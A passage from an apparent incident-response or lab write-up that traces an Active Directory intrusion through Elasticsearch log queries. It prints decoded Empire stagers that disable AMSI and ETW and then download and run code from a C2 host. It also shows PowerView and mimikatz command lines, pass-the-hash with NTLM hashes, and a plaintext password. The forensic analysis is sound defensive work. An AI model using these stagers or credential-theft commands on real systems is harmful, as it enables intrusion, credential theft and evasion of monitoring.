QAZABhAHQAYQBbADQALgAuACQAZABhAHQAYQAuAGwAZQBuAGcAdABoAF0AOwAtAGoAbwBpAG4AWwBDAGgAYQByAFsAXQBdACgAJgAgACQAUgAgACQAZABhAHQAYQAgACgAJABJAFYAKwAkAEsAKQApAHwASQBFAFgA" | base64 -d

  If($PSVersionTable.PSVersion.Major -ge 3){$Ref=[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils');$Ref.GetField('amsiInitFailed','NonPublic,Static').Setvalue($Null,$true);[System.Diagnostics.Eventing.EventProvider].GetField('m_enabled','NonPublic,Instance').SetValue([Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider','NonPublic,Static').GetValue($null),0);};[System.Net.ServicePointManager]::Expect100Continue=0;$wc=New-Object System.Net.WebClient;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';$ser=$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('aAB0AHQAcAA6AC8ALwBjAGQAbgAuAGIAYQBuAGEAbgBhAHAAZQBlAGwAcABhAHIAdAB5AC4AbgBlAHQAOgA4ADAA')));$t='/news.php';$wc.Headers.Add('User-Agent',$u);$wc.Proxy=[System.Net.WebRequest]::DefaultWebProxy;$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;$Script:Proxy = $wc.Proxy;$K=[System.Text.Encoding]::ASCII.GetBytes('}wS1&VNqoIY*G#5-Plv{p2f=4Z?uat@<');$R={$D,$K=$Args;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.Count])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bxor$S[($S[$I]+$S[$H])%256]}};$wc.Headers.Add("Cookie","rlkHVXWbb=TpmUDibXpfiUU1/mwqwmentgb3I=");$data=$wc.DownloadData($ser+$t);$iv=$data[0..3];$data=$data[4..$data.length];-join[Char[]](& $R $data ($IV+$K))|IEX
  
$ echo "aAB0AHQAcAA6AC8ALwBjAGQAbgAuAGIAYQBuAGEAbgBhAHAAZQBlAGwAcABhAHIAdAB5AC4AbgBlAHQAOgA4ADAA" | base64 -d

  http://cdn.bananapeelparty.net:80

It is an Empire stager and calls back to cdn.bananapeelparty.net:80 or 165.232.170.151:80:

$ cat query_net.json 

  {
	"query":{
		"bool": {
			"must": {
				"term": {
					"process.pid": "6160"
				}
			},
			"should": [{
				"match": {
					"event.category": "network"
				}
			}],
			"filter": {
				"range": {
					"@timestamp": {
        					"gte": "2023-08-29T00:00:00", 
        					"lte": "2023-08-31T00:00:00"
					}
				}
			}
		}
	},
	"_source": ["@timestamp", "host.hostname", "source.ip", "source.port", "destination.ip", "destination.port"]
  }
  
$ curl -d "$(cat query_net.json)" -H 'Content-Type: application/json' -s http://elastic:elastic@10.10.241.17:9200/winlogbeat-7.17.6-2023.08.29-000001/_search?size=3000 | jq -c '.hits.hits[]."_source"' | jq -r '"\(.host.hostname)\t\(.destination.ip):\(.destination.port)"' | sort | uniq -c | sort -nr

   2424 WKSTN-0051	165.232.170.151:80
     23 WKSTN-0051	null:null
      5 WKSTN-0051	10.10.97.43:389
      2 WKSTN-0051	185.199.110.133:443
      1 WKSTN-0051	185.199.111.133:443
      1 WKSTN-0051	185.199.109.133:443
      1 WKSTN-0051	140.82.121.3:443

Following the commands associated with the Empire stager, the attacker performed enumeration targeting the domain and proceeded to download and execute mimikatz.exe where they were able to authenticate as itadmin via Pass-the-Hash:

$ curl -d "$(cat query.json)" -H 'Content-Type: application/json' -s http://elastic:elastic@10.10.241.17:9200/winlogbeat-7.17.6-2023.08.29-000001/_search?size=3000 | jq -c '.hits.hits[]."_source"' | grep command_line | jq -r '"\(."@timestamp")  \(.user.name)\t\(.process.pid)\t\(.process.parent.pid)\t\(.process.command_line)"' | sort | grep 6160

  [..omitted..]
  2023-08-29T23:55:17.945Z  evan.hutchinson	4896	6160	"C:\Windows\system32\cmd.exe" /c "whoami /all"
  2023-08-30T00:06:38.162Z  evan.hutchinson	7736	6160	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1 -useb); Get-DomainComputer"
  2023-08-30T00:08:56.421Z  evan.hutchinson	6328	6160	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1 -useb); Get-Domain"
  2023-08-30T00:09:23.529Z  evan.hutchinson	4844	6160	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1 -useb); Get-DomainUser"
  2023-08-30T00:09:57.186Z  evan.hutchinson	6968	6160	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "iwr https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20220919/mimikatz_trunk.zip -outfile mimi.zip"
  2023-08-30T00:10:15.314Z  evan.hutchinson	5532	6160	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "Expand-Archive mimi.zip"
  2023-08-30T00:11:26.438Z  evan.hutchinson	4948	6160	"C:\Windows\Temp\m\x64\mimi\x64\mimikatz.exe" privilege::debug sekurlsa::logonpasswords exit
  2023-08-30T00:13:37.090Z  evan.hutchinson	1892	6160	"C:\Windows\Temp\m\x64\mimi\x64\mimikatz.exe" "sekurlsa::pth /user:itadmin /domain:QUICKLOGISTICS /ntlm:F84769D250EB95EB2D7D8B4A1C5613F2 /run:powershell.exe" exit
  [..omitted..]

II. WKSTN-1327

Using Invoke-ShareFinder from PowerView.ps1, the attacker seems to have discovered credentials for allan.smith in a file named, IT_Automation.ps1, and executed commands on WKSTN-1327 remotely via Invoke-Command:

$ curl -d "$(cat query.json)" -H 'Content-Type: application/json' -s http://elastic:elastic@10.10.241.17:9200/winlogbeat-7.17.6-2023.08.29-000001/_search?size=3000 | jq -c '.hits.hits[]."_source"' | grep command_line | jq -r '"\(."@timestamp")  \(.user.name)\t\(.process.pid)\t\(.process.parent.pid)\t\(.process.command_line)"' | sort | grep 6160

  [..omitted..]
  2023-08-30T00:14:36.078Z  evan.hutchinson	3312	6160	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1 -useb); Invoke-ShareFinder"
  2023-08-30T00:18:38.647Z  evan.hutchinson	3288	6160	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "ls FileSystem::\\WKSTN-1327.quicklogistics.org\ITFiles"
  2023-08-30T00:19:52.889Z  evan.hutchinson	4820	6160	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "cat FileSystem::\\WKSTN-1327.quicklogistics.org\ITFiles\IT_Automation.ps1"
  2023-08-30T00:20:23.384Z  evan.hutchinson	7952	6160	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "$credential = (New-Object PSCredential -ArgumentList (" "QUICKLOGISTICS\allan.smith, (ConvertTo-SecureString Tr!ckyP@ssw0rd987 -AsPlainText -Force))) ; Invoke-Command -Credential $credential -ComputerName WKSTN-1327 -ScriptBlock {whoami}"
  2023-08-30T00:20:56.818Z  evan.hutchinson	6848	6160	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "$credential = (New-Object PSCredential -ArgumentList ('QUICKLOGISTICS\allan.smith', (ConvertTo-SecureString 'Tr!ckyP@ssw0rd987' -AsPlainText -Force))) ; Invoke-Command -Credential $credential -ComputerName WKSTN-1327 -ScriptBlock {whoami}"
  [..omitted..]

Another Empire stager was executed on the new workstation using the same method:

$ curl -d "$(cat query.json)" -H 'Content-Type: application/json' -s http://elastic:elastic@10.10.241.17:9200/winlogbeat-7.17.6-2023.08.29-000001/_search?size=3000 | jq -c '.hits.hits[]."_source"' | grep command_line | jq -r '"\(."@timestamp")  \(.user.name)\t\(.process.pid)\t\(.process.parent.pid)\t\(.process.command_line)"' | sort | grep 6160

  [..omitted..]
  2023-08-30T00:21:52.606Z  evan.hutchinson	4976	6160	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "$credential = (New-Object PSCredential -ArgumentList ('QUICKLOGISTICS\allan.smith', (ConvertTo-SecureString 'Tr!ckyP@ssw0rd987' -AsPlainText -Force))) ; Invoke-Command -Credential $credential -ComputerName WKSTN-1327 -ScriptBlock {powershell -enc SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAfQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoARQB4AHAAZQBjAHQAMQAwADAAQwBvAG4AdABpAG4AdQBlAD0AMAA7ACQAdwBjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHMAZQByAD0AJAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBqAEEARwBRAEEAYgBnAEEAdQBBAEcASQBBAFkAUQBCAHUAQQBHAEUAQQBiAGcAQgBoAEEASABBAEEAWgBRAEIAbABBAEcAdwBBAGMAQQBCAGgAQQBIAEkAQQBkAEEAQgA1AEEAQwA0AEEAYgBnAEIAbABBAEgAUQBBAE8AZwBBADQAQQBEAEEAQQAnACkAKQApADsAJAB0AD0AJwAvAGEAZABtAGkAbgAvAGcAZQB0AC4AcABoAHAAJwA7ACQAdwBjAC4ASABlAGEAZABlAHIAcwAuAEEAZABkACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAkAHUAKQA7ACQAdwBjAC4AUAByAG8AeAB5AD0AWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBEAGUAZgBhAHUAbAB0AFcAZQBiAFAAcgBvAHgAeQA7ACQAdwBjAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQATgBlAHQAdwBvAHIAawBDAHIAZQBkAGUAbgB0AGkAYQBsAHMAOwAkAFMAYwByAGkAcAB0ADoAUAByAG8AeAB5ACAAPQAgACQAdwBjAC4AUAByAG8AeAB5ADsAJABLAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAQgB5AHQAZQBzACgAJwB9AHcAUwAxACYAVgBOAHEAbwBJAFkAKgBHACMANQAtAFAAbAB2AHsAcAAyAGYAPQA0AFoAPwB1AGEAdABAADwAJwApADsAJABSAD0AewAkAEQALAAkAEsAPQAkAEEAcgBnAHMAOwAkAFMAPQAwAC4ALgAyADUANQA7ADAALgAuADIANQA1AHwAJQB7ACQASgA9ACgAJABKACsAJABTAFsAJABfAF0AKwAkAEsAWwAkAF8AJQAkAEsALgBDAG8AdQBuAHQAXQApACUAMgA1ADYAOwAkAFMAWwAkAF8AXQAsACQAUwBbACQASgBdAD0AJABTAFsAJABKAF0ALAAkAFMAWwAkAF8AXQB9ADsAJABEAHwAJQB7ACQASQA9ACgAJABJACsAMQApACUAMgA1ADYAOwAkAEgAPQAoACQASAArACQAUwBbACQASQBdACkAJQAyADUANgA7ACQAUwBbACQASQBdACwAJABTAFsAJABIAF0APQAkAFMAWwAkAEgAXQAsACQAUwBbACQASQBdADsAJABfAC0AYgB4AG8AcgAkAFMAWwAoACQAUwBbACQASQBdACsAJABTAFsAJABIAF0AKQAlADIANQA2AF0AfQB9ADsAJAB3AGMALgBIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAiAEMAbwBvAGsAaQBlACIALAAiAHIAbABrAEgAVgBYAFcAYgBiAD0AMQAzAGMAZgBjAG8AOQByAFUAWAB4ADAAaQA0AEoAMwB4AFQAdQA2ADgAMgBKAEYAaQBYADAAPQAiACkAOwAkAGQAYQB0AGEAPQAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJABzAGUAcgArACQAdAApADsAJABpAHYAPQAkAGQAYQB0AGEAWwAwAC4ALgAzAF0AOwAkAGQAYQB0AGEAPQAkAGQAYQB0AGEAWwA0AC4ALgAkAGQAYQB0AGEALgBsAGUAbgBnAHQAaABdADsALQBqAG8AaQBuAFsAQwBoAGEAcgBbAF0AXQAoACYAIAAkAFIAIAAkAGQAYQB0AGEAIAAoACQASQBWACsAJABLACkAKQB8AEkARQBYAA==}"
  
$ echo "SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAfQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoARQB4AHAAZQBjAHQAMQAwADAAQwBvAG4AdABpAG4AdQBlAD0AMAA7ACQAdwBjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHMAZQByAD0AJAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBqAEEARwBRAEEAYgBnAEEAdQBBAEcASQBBAFkAUQBCAHUAQQBHAEUAQQBiAGcAQgBoAEEASABBAEEAWgBRAEIAbABBAEcAdwBBAGMAQQBCAGgAQQBIAEkAQQBkAEEAQgA1AEEAQwA0AEEAYgBnAEIAbABBAEgAUQBBAE8AZwBBADQAQQBEAEEAQQAnACkAKQApADsAJAB0AD0AJwAvAGEAZABtAGkAbgAvAGcAZQB0AC4AcABoAHAAJwA7ACQAdwBjAC4ASABlAGEAZABlAHIAcwAuAEEAZABkACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAkAHUAKQA7ACQAdwBjAC4AUAByAG8AeAB5AD0AWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBEAGUAZgBhAHUAbAB0AFcAZQBiAFAAcgBvAHgAeQA7ACQAdwBjAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQATgBlAHQAdwBvAHIAawBDAHIAZQBkAGUAbgB0AGkAYQBsAHMAOwAkAFMAYwByAGkAcAB0ADoAUAByAG8AeAB5ACAAPQAgACQAdwBjAC4AUAByAG8AeAB5ADsAJABLAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAQgB5AHQAZQBzACgAJwB9AHcAUwAxACYAVgBOAHEAbwBJAFkAKgBHACMANQAtAFAAbAB2AHsAcAAyAGYAPQA0AFoAPwB1AGEAdABAADwAJwApADsAJABSAD0AewAkAEQALAAkAEsAPQAkAEEAcgBnAHMAOwAkAFMAPQAwAC4ALgAyADUANQA7ADAALgAuADIANQA1AHwAJQB7ACQASgA9ACgAJABKACsAJABTAFsAJABfAF0AKwAkAEsAWwAkAF8AJQAkAEsALgBDAG8AdQBuAHQAXQApACUAMgA1ADYAOwAkAFMAWwAkAF8AXQAsACQAUwBbACQASgBdAD0AJABTAFsAJABKAF0ALAAkAFMAWwAkAF8AXQB9ADsAJABEAHwAJQB7ACQASQA9ACgAJABJACsAMQApACUAMgA1ADYAOwAkAEgAPQAoACQASAArACQAUwBbACQASQBdACkAJQAyADUANgA7ACQAUwBbACQASQBdACwAJABTAFsAJABIAF0APQAkAFMAWwAkAEgAXQAsACQAUwBbACQASQBdADsAJABfAC0AYgB4AG8AcgAkAFMAWwAoACQAUwBbACQASQBdACsAJABTAFsAJABIAF0AKQAlADIANQA2AF0AfQB9ADsAJAB3AGMALgBIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAiAEMAbwBvAGsAaQBlACIALAAiAHIAbABrAEgAVgBYAFcAYgBiAD0AMQAzAGMAZgBjAG8AOQByAFUAWAB4ADAAaQA0AEoAMwB4AFQAdQA2ADgAMgBKAEYAaQBYADAAPQAiACkAOwAkAGQAYQB0AGEAPQAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJABzAGUAcgArACQAdAApADsAJABpAHYAPQAkAGQAYQB0AGEAWwAwAC4ALgAzAF0AOwAkAGQAYQB0AGEAPQAkAGQAYQB0AGEAWwA0AC4ALgAkAGQAYQB0AGEALgBsAGUAbgBnAHQAaABdADsALQBqAG8AaQBuAFsAQwBoAGEAcgBbAF0AXQAoACYAIAAkAFIAIAAkAGQAYQB0AGEAIAAoACQASQBWACsAJABLACkAKQB8AEkARQBYAA==" | base64 -d

  If($PSVersionTable.PSVersion.Major -ge 3){};[System.Net.ServicePointManager]::Expect100Continue=0;$wc=New-Object System.Net.WebClient;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';$ser=$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('aAB0AHQAcAA6AC8ALwBjAGQAbgAuAGIAYQBuAGEAbgBhAHAAZQBlAGwAcABhAHIAdAB5AC4AbgBlAHQAOgA4ADAA')));$t='/admin/get.php';$wc.Headers.Add('User-Agent',$u);$wc.Proxy=[System.Net.WebRequest]::DefaultWebProxy;$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;$Script:Proxy = $wc.Proxy;$K=[System.Text.Encoding]::ASCII.GetBytes('}wS1&VNqoIY*G#5-Plv{p2f=4Z?uat@<');$R={$D,$K=$Args;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.Count])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bxor$S[($S[$I]+$S[$H])%256]}};$wc.Headers.Add("Cookie","rlkHVXWbb=13cfco9rUXx0i4J3xTu682JFiX0=");$data=$wc.DownloadData($ser+$t);$iv=$data[0..3];$data=$data[4..$data.length];-join[Char[]](& $R $data ($IV+$K))|IEX
  
$ echo 'aAB0AHQAcAA6AC8ALwBjAGQAbgAuAGIAYQBuAGEAbgBhAHAAZQBlAGwAcABhAHIAdAB5AC4AbgBlAHQAOgA4ADAA' | base64 -d

  http://cdn.bananapeelparty.net:80

Confirming if the Invoke-Command executions were successful, it can be seen that the commands were spawned via wsmprovhost.exe meaning the attempt went through:

$ curl -d "$(cat query.json)" -H 'Content-Type: application/json' -s http://elastic:elastic@10.10.241.17:9200/winlogbeat-7.17.6-2023.08.29-000001/_search?size=3000 | jq -c '.hits.hits[]."_source"' | grep command_line | jq -r '"\(."@timestamp")  \(.user.name)\t\(.process.pid)\t\(.process.parent.pid)\t\(.process.command_line)"' | sort            

  2023-08-30T00:20:59.159Z  allan.smith	4892	752	C:\Windows\system32\wsmprovhost.exe -Embedding
  2023-08-30T00:20:59.718Z  allan.smith	5076	4892	"C:\Windows\system32\whoami.exe"
  2023-08-30T00:21:53.053Z  allan.smith	6788	752	C:\Windows\system32\wsmprovhost.exe -Embedding
  2023-08-30T00:21:53.284Z  allan.smith	6708	6788	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAfQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoARQB4AHAAZQBjAHQAMQAwADAAQwBvAG4AdABpAG4AdQBlAD0AMAA7ACQAdwBjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHMAZQByAD0AJAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBqAEEARwBRAEEAYgBnAEEAdQBBAEcASQBBAFkAUQBCAHUAQQBHAEUAQQBiAGcAQgBoAEEASABBAEEAWgBRAEIAbABBAEcAdwBBAGMAQQBCAGgAQQBIAEkAQQBkAEEAQgA1AEEAQwA0AEEAYgBnAEIAbABBAEgAUQBBAE8AZwBBADQAQQBEAEEAQQAnACkAKQApADsAJAB0AD0AJwAvAGEAZABtAGkAbgAvAGcAZQB0AC4AcABoAHAAJwA7ACQAdwBjAC4ASABlAGEAZABlAHIAcwAuAEEAZABkACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAkAHUAKQA7ACQAdwBjAC4AUAByAG8AeAB5AD0AWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBEAGUAZgBhAHUAbAB0AFcAZQBiAFAAcgBvAHgAeQA7ACQAdwBjAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQATgBlAHQAdwBvAHIAawBDAHIAZQBkAGUAbgB0AGkAYQBsAHMAOwAkAFMAYwByAGkAcAB0ADoAUAByAG8AeAB5ACAAPQAgACQAdwBjAC4AUAByAG8AeAB5ADsAJABLAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAQgB5AHQAZQBzACgAJwB9AHcAUwAxACYAVgBOAHEAbwBJAFkAKgBHACMANQAtAFAAbAB2AHsAcAAyAGYAPQA0AFoAPwB1AGEAdABAADwAJwApADsAJABSAD0AewAkAEQALAAkAEsAPQAkAEEAcgBnAHMAOwAkAFMAPQAwAC4ALgAyADUANQA7ADAALgAuADIANQA1AHwAJQB7ACQASgA9ACgAJABKACsAJABTAFsAJABfAF0AKwAkAEsAWwAkAF8AJQAkAEsALgBDAG8AdQBuAHQAXQApACUAMgA1ADYAOwAkAFMAWwAkAF8AXQAsACQAUwBbACQASgBdAD0AJABTAFsAJABKAF0ALAAkAFMAWwAkAF8AXQB9ADsAJABEAHwAJQB7ACQASQA9ACgAJABJACsAMQApACUAMgA1ADYAOwAkAEgAPQAoACQASAArACQAUwBbACQASQBdACkAJQAyADUANgA7ACQAUwBbACQASQBdACwAJABTAFsAJABIAF0APQAkAFMAWwAkAEgAXQAsACQAUwBbACQASQBdADsAJABfAC0AYgB4AG8AcgAkAFMAWwAoACQAUwBbACQASQBdACsAJABTAFsAJABIAF0AKQAlADIANQA2AF0AfQB9ADsAJAB3AGMALgBIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAiAEMAbwBvAGsAaQBlACIALAAiAHIAbABrAEgAVgBYAFcAYgBiAD0AMQAzAGMAZgBjAG8AOQByAFUAWAB4ADAAaQA0AEoAMwB4AFQAdQA2ADgAMgBKAEYAaQBYADAAPQAiACkAOwAkAGQAYQB0AGEAPQAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJABzAGUAcgArACQAdAApADsAJABpAHYAPQAkAGQAYQB0AGEAWwAwAC4ALgAzAF0AOwAkAGQAYQB0AGEAPQAkAGQAYQB0AGEAWwA0AC4ALgAkAGQAYQB0AGEALgBsAGUAbgBnAHQAaABdADsALQBqAG8AaQBuAFsAQwBoAGEAcgBbAF0AXQAoACYAIAAkAFIAIAAkAGQAYQB0AGEAIAAoACQASQBWACsAJABLACkAKQB8AEkARQBYAA==
  [..omitted..]

It seems that allan.smith is a Local Administrator on the workstation and the attacker leveraged the fact by dumping credentials via a downloaded mimikatz.exe. This time, revealing the NTLM hash of the Domain Administrator, Administrator:

$ curl -d "$(cat query.json)" -H 'Content-Type: application/json' -s http://elastic:elastic@10.10.241.17:9200/winlogbeat-7.17.6-2023.08.29-000001/_search?size=3000 | jq -c '.hits.hits[]."_source"' | grep command_line | jq -r '"\(."@timestamp")  \(.user.name)\t\(.process.pid)\t\(.process.parent.pid)\t\(.process.command_line)"' | sort | grep 6708

  [..omitted..]
  2023-08-30T00:22:15.913Z  allan.smith	5128	6708	"C:\Windows\system32\cmd.exe" /c hostname
  2023-08-30T00:22:22.315Z  allan.smith	5096	6708	"C:\Windows\system32\cmd.exe" /c "whoami /all"
  2023-08-30T01:28:22.638Z  allan.smith	6612	6708	"C:\Windows\system32\more.com"
  2023-08-30T01:29:09.409Z  allan.smith	1812	6708	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "iwr https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20220919/mimikatz_trunk.zip -outfile mimi.zip"
  2023-08-30T01:29:39.620Z  allan.smith	6528	6708	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "Expand-Archive mimi.zip"
  2023-08-30T01:30:25.545Z  allan.smith	2056	6708	"C:\Users\allan.smith\Documents\mimi\x64\mimikatz.exe" "sekurlsa::pth /user:itadmin /domain:QUICKLOGISTICS /ntlm:F84769D250EB95EB2D7D8B4A1C5613F2 /run:powershell.exe" exit
  2023-08-30T01:30:51.647Z  allan.smith	6736	6708	"C:\Users\allan.smith\Documents\mimi\x64\mimikatz.exe" privilege::debug sekurlsa::logonpasswords exit
  2023-08-30T01:31:39.366Z  allan.smith	6236	6708	"C:\Users\allan.smith\Documents\mimi\x64\mimikatz.exe" "sekurlsa::pth /user:administrator /domain:QUICKLOGISTICS /ntlm:00f80f2538dcb54e7adc715c0e7091ec /run:powershell.exe" exit
  [..omitted..]

The Empire stager was run again then the attacker used Invoke-Command once again to execute commands remotely on DC01 as well as establish persistence via schtasks.exe on WKSTN-1327:

$ curl -d "$(cat query.json)" -H 'Content-Type: application/json' -s http://elastic:elastic@10.10.241.17:9200/winlogbeat-7.17.6-2023.08.29-000001/_search?size=3000 | jq -c '.hits.hits[]."_source"' | grep command_line | jq -r '"\(."@timestamp")  \(.user.name)\t\(.process.pid)\t\(.process.parent.pid)\t\(.process.command_line)"' | sort | grep 2780                 

  2023-08-30T01:40:38.541Z  allan.smith	2780	752	C:\Windows\system32\wsmprovhost.exe -Embedding
